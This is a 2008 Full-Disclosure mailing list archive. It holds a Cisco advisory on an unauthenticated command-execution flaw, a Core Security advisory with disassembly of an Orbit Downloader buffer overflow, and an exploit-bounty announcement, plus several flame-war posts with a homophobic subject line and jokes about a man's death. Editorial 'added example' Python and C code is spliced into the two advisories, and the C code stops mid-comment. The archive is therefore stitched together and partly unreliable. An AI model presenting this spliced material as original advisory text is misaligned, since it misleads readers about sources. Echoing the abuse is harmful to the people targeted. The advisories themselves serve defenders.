In-Reply-To: <82abd3a70804020614r504fd633mbf75a8cdde17564d@mail.gmail.com>
References: <82abd3a70804020614r504fd633mbf75a8cdde17564d@mail.gmail.com>
Message-ID: <8e2fa2650804030658q775caf32l64846ad96b6d03a0@mail.gmail.com>

Haha, that's nice. How's that for ethical behavior? :)

On Wed, Apr 2, 2008 at 9:14 AM, Michael Simpson wrote:
> On 4/2/08, Cassidy MacFarlane wrote:
> > "Youre playing with fire. Fire that cannot be put out with words but
> > only inflame the situation of which you are misinformed."
> > - n3td3v
>
> lolz
>
> and the classic:
>
> Hello Mi5, Mi6, Symantec
>
> I have information regarding Yahoo
>
> Reference:
> http://groups.google.com/group/n3td3v/browse_wank/thread/7b60d3fbd0eb9a77/7d1f85fbe122fb29#7d1f85fbe122fb29
>
> I used to be his friend but now he fell out with me, so I want to tell
> everyone about him, because he's a yahoo employee i used to give
> "intelligence" to, but now he backstabbed me, and he miscalculated how
> much i knew about him and his "circle of friends".
>
> He works for Yahoo
>
> Contact me on e-mail and we can exchange phone numbers mibbe go out
> for a meal, circle-jerk &c
>
> Regards,
>
> n3td3v

From groffg at gmgdesign.com Thu Apr 3 15:02:04 2008
From: groffg at gmgdesign.com (Garrett M. Groff)
Date: Thu, 3 Apr 2008 10:02:04 -0400
Subject: [Full-disclosure] Fwd: Let's outlaw mass securityconferencespamming its f****** gay
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com> <4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com> <4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com> <27886.1207189079@turing-police.cc.vt.edu> <030b01c89543$0b481540$6401a8c0@maryl> <82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com> <6158bb410804030645w4057c055o503ff0302f87e1f8@mail.gmail.com>
Message-ID: <004e01c89593$4cec60f0$336b880a@softpro.corp>

Regarding the particular person in question, I'll defer to others who
know him (or her, or they, or whomever) better than I do.
Instead, I'll say that, generally, on lists like FD, there is a minority
of out-spoken personalities who sadly support the stereotypical hacker
persona: condescending egoists who are socially inept and emotionally
charged when discussing topics that relate to their knowledge domain.
That's unfortunate, since the broader IT security community is poorly
represented due to attention-seeking zealots.

Regarding the idea of "outlawing security conference spamming," I'd say
the literal idea of outlawing cross-posts to multiple security mailing
lists is a bad idea. The idea that the legislature should write into law
legislation that reduces our freedom in such a sense is a slippery slope
borne of emotionalism and narrowness. What else should the government do
to curtail our freedoms? I tend to side with libertarian types (though I
don't call myself a "libertarian" un-qualified) on what the government
should do and what they should not do. And micro-manage security mailing
lists is something they should not do. It's a bad idea and would make a
dreadful precedent.

- G

----- Original Message -----
From: Ureleet
To: Michael Simpson
Cc: full-disclosure at lists.grok.org.uk
Sent: Thursday, April 03, 2008 9:45 AM
Subject: Re: [Full-disclosure] Fwd: Let's outlaw mass securityconferencespamming its fucking gay

or, he's just stupid? spade equals spade.

From mlande at bellsouth.net Thu Apr 3 15:36:15 2008
From: mlande at bellsouth.net (Mary Landesman)
Date: Thu, 3 Apr 2008 10:36:15 -0400
Subject: [Full-disclosure] Fwd: Let's outlaw mass securityconferencespamming its fucking gay
In-Reply-To: <82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com> <4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com> <4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com> <27886.1207189079@turing-police.cc.vt.edu> <030b01c89543$0b481540$6401a8c0@maryl> <82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com>
Message-ID: <019a01c89598$12d07c80$6401a8c0@maryl>

I feel compelled to point out that my comments were meant tongue-in-cheek,
hence the 'demonic possession', 'being a bore' reference. I should never
underestimate the necessity of a well placed :-)

-- Mary

From se_cur_ity at hotmail.com Thu Apr 3 16:18:53 2008
From: se_cur_ity at hotmail.com (Morning Wood)
Date: Thu, 3 Apr 2008 08:18:53 -0700
Subject: [Full-disclosure] RIP epic
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com> <4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com> <4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com> <27886.1207189079@turing-police.cc.vt.edu> <030b01c89543$0b481540$6401a8c0@maryl> <82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com> <019a01c89598$12d07c80$6401a8c0@maryl>
Message-ID:

RIP epic - http://www.hack3r.com

You will be missed, fly on bro.

From razishaban at gmail.com Thu Apr 3 16:28:11 2008
From: razishaban at gmail.com (Razi Shaban)
Date: Thu, 3 Apr 2008 18:28:11 +0300
Subject: [Full-disclosure] RIP epic
In-Reply-To:
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com> <4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com> <4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com> <27886.1207189079@turing-police.cc.vt.edu> <030b01c89543$0b481540$6401a8c0@maryl> <82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com> <019a01c89598$12d07c80$6401a8c0@maryl>
Message-ID: <2d792fb20804030828s2edc2ca1mc2573b246141555f@mail.gmail.com>

What happened to him?

-- Razi

On 4/3/08, Morning Wood wrote:
> RIP epic - http://www.hack3r.com
>
> You will be missed, fly on bro.
From psirt at cisco.com Thu Apr 3 17:00:00 2008
From: psirt at cisco.com (Cisco Systems Product Security Incident Response Team)
Date: Thu, 03 Apr 2008 16:00:00 -0000
Subject: [Full-disclosure] Cisco Security Advisory: Cisco Unified Communications Disaster Recovery Framework Command Execution Vulnerability
Message-ID: <20080403.drf@psirt.cisco.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cisco Security Advisory: Cisco Unified Communications Disaster Recovery
Framework Command Execution Vulnerability

Advisory ID: cisco-sa-20080403-drf

http://www.cisco.com/warp/public/707/cisco-sa-20080403-drf.shtml

Revision 1.0

For Public Release 2008 April 03 1600 UTC (GMT)

- ---------------------------------------------------------------------

Summary
=======

Several products in the Cisco Unified Communications family of products
contain a command execution vulnerability in the Disaster Recovery
Framework (DRF) feature. A remote, unauthenticated user could exploit
this vulnerability to execute arbitrary commands that may allow full
administrative access to affected systems.

There is a workaround for this vulnerability.

Cisco has released free software updates that address this vulnerability.

This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20080403-drf.shtml

Affected Products
=================

Vulnerable Products
+------------------

The following Cisco products are known to be vulnerable:

  * Cisco Unified Communications Manager (CUCM) 5.x and 6.x
  * Cisco Unified Communications Manager Business Edition
  * Cisco Unified Presence 1.x and 6.x
  * Cisco Emergency Responder 2.x
  * Cisco Mobility Manager 2.x

Products Confirmed Not Vulnerable
+--------------------------------

Cisco Unified Communications Manager versions 3.x and 4.x are not
vulnerable. No other Cisco products are currently known to be affected
by these vulnerabilities.
Details
=======

The Disaster Recovery Framework (DRF) is a feature shared among several
products in the Cisco Unified Communications family of products. DRF
allows administrators to back up and restore a system configuration to
a local tape drive or remote server. The DRF Master server is
responsible for performing backup and restoration requests.

This vulnerability documents an issue where the DRF Master server does
not perform authentication on requests that it receives over the
network. A remote, unauthenticated user can connect to the DRF Master
server and may be able to perform any DRF-related tasks. These tasks
include:

  * Modifying or deleting a scheduled backup
  * Copying a system backup to a remote, user-specified server
  * Restoring a user-specified configuration from a remote server
  * Executing arbitrary operating system commands

An attacker could exploit this vulnerability to cause a denial of
service condition, obtain sensitive configuration information,
overwrite configuration parameters, or execute arbitrary commands with
full administrative privileges.

This vulnerability is documented in CVE-2008-1154 and the following
Cisco Bug IDs:

  * CSCso53771 - Cisco Unified Communications Manager 5.x and 6.x

Vulnerability Scoring Details
=============================

Cisco has provided scores for the vulnerability in this advisory based
on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in
this Security Advisory is done in accordance with CVSS version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
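As an added worked example, not part of Cisco's advisory or of Cisco's CVSS calculator, the Python below implements the CVSS v2.0 base and temporal equations and checks that the metric values Cisco lists for CSCso53771 (Access Vector Network, Access Complexity Low, Authentication None, all three impacts Complete; Exploitability Functional, Remediation Level Official-Fix, Report Confidence Confirmed) reproduce the base score of 10 and the temporal score of 8.3. The weights are the ones defined in the CVSS v2.0 specification; the calculator is general, so it goes beyond this one vulnerability and scores any v2 base or temporal vector.

```python
"""CVSS v2.0 base and temporal scoring (added example, not Cisco's tooling).

Metric weights are from the CVSS v2.0 specification; the two vectors for
CSCso53771 are transcribed from the advisory's scoring section.
"""
from decimal import Decimal, ROUND_HALF_UP
from typing import Dict

# Base metric weights (CVSS v2.0).
ACCESS_VECTOR = {"L": Decimal("0.395"), "A": Decimal("0.646"), "N": Decimal("1.0")}
ACCESS_COMPLEXITY = {"H": Decimal("0.35"), "M": Decimal("0.61"), "L": Decimal("0.71")}
AUTHENTICATION = {"M": Decimal("0.45"), "S": Decimal("0.56"), "N": Decimal("0.704")}
IMPACT = {"N": Decimal("0.0"), "P": Decimal("0.275"), "C": Decimal("0.660")}

# Temporal metric weights (CVSS v2.0); "ND" means Not Defined.
EXPLOITABILITY = {"U": Decimal("0.85"), "POC": Decimal("0.9"), "F": Decimal("0.95"),
                  "H": Decimal("1.0"), "ND": Decimal("1.0")}
REMEDIATION_LEVEL = {"OF": Decimal("0.87"), "TF": Decimal("0.90"), "W": Decimal("0.95"),
                     "U": Decimal("1.0"), "ND": Decimal("1.0")}
REPORT_CONFIDENCE = {"UC": Decimal("0.90"), "UR": Decimal("0.95"), "C": Decimal("1.0"),
                     "ND": Decimal("1.0")}

# Vectors for CSCso53771 as listed in the advisory.
ADVISORY_BASE_VECTOR = "AV:N/AC:L/Au:N/C:C/I:C/A:C"
ADVISORY_TEMPORAL_VECTOR = "E:F/RL:OF/RC:C"


def _round1(x: Decimal) -> Decimal:
    """round_to_1_decimal() from the spec, done in decimal so 8.265 becomes 8.3, not 8.2."""
    return x.quantize(Decimal("0.1"), rounding=ROUND_HALF_UP)


def parse_vector(vector: str) -> Dict[str, str]:
    """Split 'AV:N/AC:L/...' into {'AV': 'N', 'AC': 'L', ...}."""
    return dict(part.split(":", 1) for part in vector.split("/"))


def base_score(vector: str) -> Decimal:
    """CVSS v2.0 base equation."""
    m = parse_vector(vector)
    impact = Decimal("10.41") * (1 - (1 - IMPACT[m["C"]]) * (1 - IMPACT[m["I"]]) * (1 - IMPACT[m["A"]]))
    exploitability = 20 * ACCESS_VECTOR[m["AV"]] * ACCESS_COMPLEXITY[m["AC"]] * AUTHENTICATION[m["Au"]]
    if impact == 0:
        return Decimal("0.0")  # f(Impact) = 0 when there is no impact at all
    return _round1((Decimal("0.6") * impact + Decimal("0.4") * exploitability - Decimal("1.5")) * Decimal("1.176"))


def temporal_score(base: Decimal, vector: str) -> Decimal:
    """CVSS v2.0 temporal equation, applied to the already-rounded base score."""
    m = parse_vector(vector)
    return _round1(base * EXPLOITABILITY[m["E"]] * REMEDIATION_LEVEL[m["RL"]] * REPORT_CONFIDENCE[m["RC"]])


def score_advisory() -> Dict[str, str]:
    """Reproduce the two scores Cisco lists for CSCso53771."""
    base = base_score(ADVISORY_BASE_VECTOR)
    return {"base": str(base), "temporal": str(temporal_score(base, ADVISORY_TEMPORAL_VECTOR))}


if __name__ == "__main__":
    print(score_advisory())  # {'base': '10.0', 'temporal': '8.3'}
```

Decimal arithmetic matters here: the temporal product 10.0 x 0.95 x 0.87 is exactly 8.265, and binary floating point plus round() can land on 8.2 rather than the 8.3 the advisory reports.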
Cisco has provided an FAQ to answer additional questions regarding CVSS
at
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html

Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss

CSCso53771 - Unauthenticated Access to Disaster Recovery Framework

CVSS Base Score - 10
    Access Vector:            Network
    Access Complexity:        Low
    Authentication:           None
    Confidentiality Impact:   Complete
    Integrity Impact:         Complete
    Availability Impact:      Complete

CVSS Temporal Score - 8.3
    Exploitability:           Functional
    Remediation Level:        Official-Fix
    Report Confidence:        Confirmed

Impact
======

Successful exploitation of this vulnerability could allow a remote,
unauthenticated attacker to cause a denial of service condition, obtain
sensitive configuration information, overwrite configuration parameters
or execute arbitrary commands with full administrative privileges.

Software Versions and Fixes
===========================

When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to determine
exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.

Fixed software is available for the following Cisco products. This
advisory will be updated as additional fixes are available.

A patch has been provided that can be applied to CUCM 5.x and 6.x,
CUCMBE, Cisco Unified Presence 1.x and 6.x, Cisco Emergency Responder
2.x, and Cisco Mobility Manager 2.x.
The filename is ciscocm.CSCso53771.security.patch.cop and can be downloaded at the following link:
http://www.cisco.com/cgi-bin/tablebuild.pl/callmgr-utilpage?psrtdcat20e2

Please consult the COP file Readme for installation instructions.

Workarounds
===========

Administrators can mitigate this vulnerability by disabling the DRF Master service. However, administrators should exercise caution when disabling the DRF Master service, as system backups will not occur while the service is stopped. Administrators are encouraged to perform a complete system backup before employing this workaround and use care when making configuration changes until the DRF Master service can be safely re-enabled.

Instructions for disabling the DRF Master service on Cisco Unified Communications Manager systems are available at the following link:
http://www.cisco.com/en/US/docs/voice_ip_comm/cucm/service/5_0_1/ccmsrva/sasrvact.html#wp1048220

The vulnerability may be mitigated by restricting access to the DRF Master service (TCP port 4040). For a Cisco Unified Communications Manager cluster, access to the port should be restricted to valid cluster nodes.

Additional mitigation techniques that can be deployed on Cisco devices within the network are available in the Cisco Applied Mitigation Bulletin companion document for this advisory:
http://www.cisco.com/warp/public/707/cisco-amb-20080403-drf.shtml

Obtaining Fixed Software
========================

Cisco has released free software updates that address this vulnerability. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment.

Customers may only install and expect support for the feature sets they have purchased.
By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml

Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades.

Customers with Service Contracts
+-------------------------------

Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com

Customers using Third Party Support Organizations
+------------------------------------------------

Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory.

The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed.

Customers without Service Contracts
+----------------------------------

Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC).
TAC contacts are as follows.

* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com

Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC.

Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages.

Exploitation and Public Announcements
=====================================

The Cisco PSIRT is not aware of any malicious use of the vulnerability described in this advisory.

This vulnerability was reported to Cisco by VoIPshield Systems.

Status of this Notice: FINAL
============================

THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME.

A stand-alone copy or paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors.

Distribution
============

This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20080403-drf.shtml

In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-teams@first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com

Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates.

Revision History
================

+-------------------------------------------------------+
| Revision 1.0 | 2008-April-03 | Initial public release |
+-------------------------------------------------------+

Cisco Security Procedures
=========================

Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt.
- ---------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (Darwin)

iD8DBQFH9P4/86n/Gc8U/uARAgP1AKCYJS+NnmfcbOa6X/bOGX//WtZ9bQCdE8eQ
ujmH9JrSK7JatP5eShSBxvQ=
=uxdK
-----END PGP SIGNATURE-----

From vulnwatch@digitalarmaments.com Thu Apr 3 16:39:06 2008
From: vulnwatch@digitalarmaments.com (Vulnwatch)
Date: Thu, 03 Apr 2008 17:39:06 +0200
Subject: [Full-disclosure] Digital Armaments March-April Hacking Challenge: 5, 000$ Prize - Client Vulnerabilities and Exploit
Message-ID: <47F4FA1A.4090609@digitalarmaments.com>

Digital Armaments March-April Hacking Challenge: 5,000$ Prize - Client Vulnerabilities and Exploit

Digital Armaments Advisory is 03.15.2008
http://digitalarmaments.com/content/view/46/1/

I. Details

Digital Armaments officially announces the launch of the March-April hacking challenge. The challenge starts on March 1. For the March-April Challenge, Digital Armaments will give a prize of 5,000$ for each submission that results in an Exploitable Vulnerability or Working Exploit for Windows or a Windows Diffuse Application. This should include an example and documentation. The submission must be sent during the March/April months and be received by midnight EST on April 30, 2008. The 5,000$ PRIZE will be added on top of the normal vulnerability payment (check the DACP scheme).

II. References

For further information on the Digital Armaments Contributor Program (DACP) please refer to the contribute section. Details of credits value can be found in the contribute section and in the FAQs section.

III. Legal Notices

Copyright © 2008 Digital Armaments Inc.

Redistribution of this alert electronically is allowed. It should not be edited in any way. Reprinting the whole is allowed; partial reprinting is not permitted. For any other request please email customerservice@digitalarmaments.com for permission.
Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

From soufre@gmail.com Thu Apr 3 18:36:00 2008
From: soufre@gmail.com (I. D.)
Date: Thu, 3 Apr 2008 13:36:00 -0400
Subject: [Full-disclosure] RIP epic
In-Reply-To: <2d792fb20804030828s2edc2ca1mc2573b246141555f@mail.gmail.com>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com> <4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com> <27886.1207189079@turing-police.cc.vt.edu> <030b01c89543$0b481540$6401a8c0@maryl> <82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com> <019a01c89598$12d07c80$6401a8c0@maryl> <2d792fb20804030828s2edc2ca1mc2573b246141555f@mail.gmail.com>
Message-ID: <71c852d10804031036g68350069g440482e38f889d7a@mail.gmail.com>

Who cares? Just a two-bit 'hacker' (even lied about working at Novell etc) pulling a RaT, doubt he's even dead. But a man can hope.

On Thu, Apr 3, 2008 at 11:28 AM, Razi Shaban wrote:
> What happened to him?
>
> --
> Razi
>
> On 4/3/08, Morning Wood wrote:
> > RIP epic - http://www.hack3r.com
> >
> > You will be missed, fly on bro.
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080403/60034265/attachment.html

From joey.mengele@hushmail.com Thu Apr 3 19:12:11 2008
From: joey.mengele@hushmail.com (Joey Mengele)
Date: Thu, 03 Apr 2008 14:12:11 -0400
Subject: [Full-disclosure] RIP epic
Message-ID: <20080403181212.278B32003D@mailserver7.hushmail.com>

I heard he accidentally Dead Van Duded himself while cleaning his shotgun LOLOLOL.

J

On Thu, 03 Apr 2008 13:36:00 -0400 "I. D." wrote:
>Who cares? Just a two-bit 'hacker' (even lied about working at
>Novell etc)
>pulling a RaT, doubt he's even dead. But a man can hope.
>
>On Thu, Apr 3, 2008 at 11:28 AM, Razi Shaban
> wrote:
>
>> What happened to him?
>>
>> --
>> Razi
>>
>> On 4/3/08, Morning Wood wrote:
>> > RIP epic - http://www.hack3r.com
>> >
>> > You will be missed, fly on bro.
>> >
>> > _______________________________________________
>> > Full-Disclosure - We believe in it.
>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> > Hosted and sponsored by Secunia - http://secunia.com/
>> >
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/

--
Click now for great deals on quality business cards!
http://tagline.hushmail.com/fc/REAK6ZBNoFk253woXiX9qznLAFCjSC8EH7DfdRHbFScKtHp7R40FgE/

From jeffrey.bellushi@gmail.com Thu Apr 3 20:47:21 2008
From: jeffrey.bellushi@gmail.com (Jeffrey Bellushi)
Date: Thu, 3 Apr 2008 15:47:21 -0400
Subject: [Full-disclosure] CEH Training
Message-ID:

All,

Anyone ever been to http://unethicalhacker.net/ for free CEH training? I'm wondering if it has a good success rate.

Jeffrey

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080403/e39431f3/attachment.html

From advisories@coresecurity.com Thu Apr 3 22:15:45 2008
From: advisories@coresecurity.com (CORE Security Technologies Advisories)
Date: Thu, 03 Apr 2008 18:15:45 -0300
Subject: [Full-disclosure] CORE-2008-0314 - Orbit Downloader "Download failed" buffer overflow
Message-ID: <47F54901.10103@coresecurity.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/

Orbit Downloader "Download failed" buffer overflow

*Advisory Information*

Title: Orbit Downloader "Download failed" buffer overflow
Advisory ID: CORE-2008-0314
Advisory URL: http://www.coresecurity.com/?action=item&id=2211
Date published: 2008-04-03
Date of last update: 2008-04-03
Vendors contacted: Orbit Downloader team
Release mode: Coordinated release

*Vulnerability Information*

Class: Buffer overflow
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 28541
CVE Name: CVE-2008-1602

*Vulnerability Description*

Orbit downloader [1] is vulnerable to a buffer overflow attack, which can be exploited by malicious remote attackers to execute arbitrary code. The vulnerability is due to Orbit not properly converting a URL ASCII string to Unicode. This can be exploited to execute arbitrary code by downloading a file from a specially crafted URL.

*Vulnerable Packages*

. Orbit downloader 2.6.3 and 2.6.4.
. Older versions could be vulnerable too, but they were not tested.

*Non-vulnerable Packages*

. Orbit downloader 2.6.5.

*Vendor Information, Solutions and Workarounds*

Update to Orbit downloader 2.6.5, available at http://dl.orbitdownloader.com/dl/OrbitDownloaderSetup.exe, or visit the vendor homepage at http://www.orbitdownloader.com.

*Credits*

This vulnerability was discovered and researched by Diego Juarez from Core Security Technologies.
*Technical Description / Proof of Concept Code*

When Orbit is unable to download a file, a balloon control is popped in the notification area. This is the code that takes care of drawing text to said control:

/-----------
.text:004A56D0 sub_4A56D0      proc near               ; CODE XREF: sub_42AAC0+321 p
.text:004A56D0                                         ; sub_439610+321 p ...
.text:004A56D0
.text:004A56D0 String          = word ptr -2000h
.text:004A56D0 hDC             = dword ptr  4
.text:004A56D0 arg_4           = dword ptr  8
.text:004A56D0 lpRect          = dword ptr  0Ch
.text:004A56D0 uFormat         = dword ptr  10h
.text:004A56D0
.text:004A56D0                 mov     eax, 2000h      ; reserve 0x2000 (8192) bytes in the stack
.text:004A56D5                 call    __alloca_probe
.text:004A56DA                 push    edi
.text:004A56DB                 mov     ecx, 800h
.text:004A56E0                 xor     eax, eax
.text:004A56E2                 lea     edi, [esp+2004h+String]
.text:004A56E6                 rep stosd
.text:004A56E8                 mov     eax, [esp+2004h+arg_4]
.text:004A56EF                 pop     edi
.text:004A56F0                 mov     ecx, [eax+8]
.text:004A56F3                 mov     eax, [eax+4]
.text:004A56F6                 test    eax, eax
.text:004A56F8                 jnz     short loc_4A56FF
.text:004A56FA                 mov     eax, ds:?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB ;
.text:004A56FF
.text:004A56FF loc_4A56FF:                             ; CODE XREF: sub_4A56D0+28 j
.text:004A56FF                 lea     edx, [esp+2000h+String]
.text:004A5703                 push    2000h           ; cchWideChar (write up to 16384 bytes to the buffer)
.text:004A5708                 push    edx             ; lpWideCharStr
.text:004A5709                 push    ecx             ; cchMultiByte
.text:004A570A                 push    eax             ; lpMultiByteStr
.text:004A570B                 push    0               ; dwFlags
.text:004A570D                 push    0               ; CodePage
.text:004A570F                 call    ds:MultiByteToWideChar
.text:004A5715                 mov     ecx, [esp+2000h+uFormat]
.text:004A571C                 mov     edx, [esp+2000h+lpRect]
.text:004A5723                 push    ecx             ; uFormat
.text:004A5724                 mov     ecx, [esp+2004h+hDC]
.text:004A572B                 push    edx             ; lpRect
.text:004A572C                 push    eax             ; nCount
.text:004A572D                 lea     eax, [esp+200Ch+String]
.text:004A5731                 push    eax             ; lpString
.text:004A5732                 push    ecx             ; hDC
.text:004A5733                 call    ds:DrawTextW
.text:004A5739                 add     esp, 2000h
.text:004A573F                 retn
.text:004A573F                 endp ;sub_4A56D0
- -----------/

According to MSDN [2], the Win32 API function

/-----------
int MultiByteToWideChar(
    UINT   CodePage,
    DWORD  dwFlags,
    LPCSTR lpMultiByteStr,
    int    cbMultiByte,
    LPWSTR lpWideCharStr,
    int    cchWideChar
);
- -----------/

has a parameter 'cchWideChar' which should be the "size, in WCHAR values, of the buffer indicated by lpWideCharStr". By supplying a download URL longer than 4096 bytes, if the download fails, 'MultiByteToWideChar' will overflow the 8192 bytes buffer in the stack and write up to 0x2000 WCHARs (16384 bytes) to it, overwriting internal structures and enabling arbitrary code execution.

*Report Timeline*

. 2008-03-19: Core Security Technologies notifies the Orbit team of the vulnerability.
. 2008-03-27: The Orbit team asks Core Security Technologies for a technical description of the vulnerability.
. 2008-03-27: Technical details sent to the Orbit team by Core Security Technologies.
. 2008-04-03: Orbit notifies Core Security Technologies that a fix has been produced.
. 2008-04-03: CORE-2008-0314 advisory is published.
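The listing above turns on one unit mismatch: the buffer is 0x2000 bytes, but 0x2000 is passed as a count of WCHARs. The following is an added example in portable C, not Orbit's code and not Core's proof of concept. MultiByteToWideChar is modelled by a small local ASCII-only function so the example runs off Windows; the 8 KiB buffer, the 0x2000 count and the 4096-byte threshold are the figures from the listing, while the function names, the model's behaviour and the constructed 'A'-filled URL are assumptions of this example.

```c
/* Added example: the size-unit mistake behind CORE-2008-0314, modelled
 * portably. Nothing here is Orbit's or Core's code. */
#include <limits.h>
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

typedef uint16_t WCHAR;                           /* Windows WCHAR is a 16-bit code unit */
#define BUF_BYTES  0x2000                         /* the 8192-byte stack buffer in the listing */
#define BUF_WCHARS (BUF_BYTES / sizeof(WCHAR))    /* 4096: its real capacity in WCHARs */

/* Assumed stand-in for MultiByteToWideChar, restricted to ASCII input.
 * cch_wide is the capacity of dst in WCHARs; like the real API it refuses
 * to write beyond that and returns 0 (the real one sets
 * ERROR_INSUFFICIENT_BUFFER). It never writes more than cch_wide WCHARs. */
static int model_mb_to_wc(const char *src, int cb, WCHAR *dst, int cch_wide)
{
    if (cb > cch_wide)
        return 0;
    for (int i = 0; i < cb; i++)
        dst[i] = (unsigned char)src[i];
    return cb;
}

/* The bug: the call site hands the buffer's size in BYTES (0x2000) to a
 * parameter measured in WCHARs, so the converter is told it may write
 * 0x2000 WCHARs. Returns how many bytes that permission covers. */
static size_t vulnerable_write_limit_bytes(void)
{
    int cch_passed = BUF_BYTES;                   /* what the listing pushes */
    return (size_t)cch_passed * sizeof(WCHAR);    /* 16384: twice the buffer */
}

/* Fix: express the capacity in the unit the API expects and treat a
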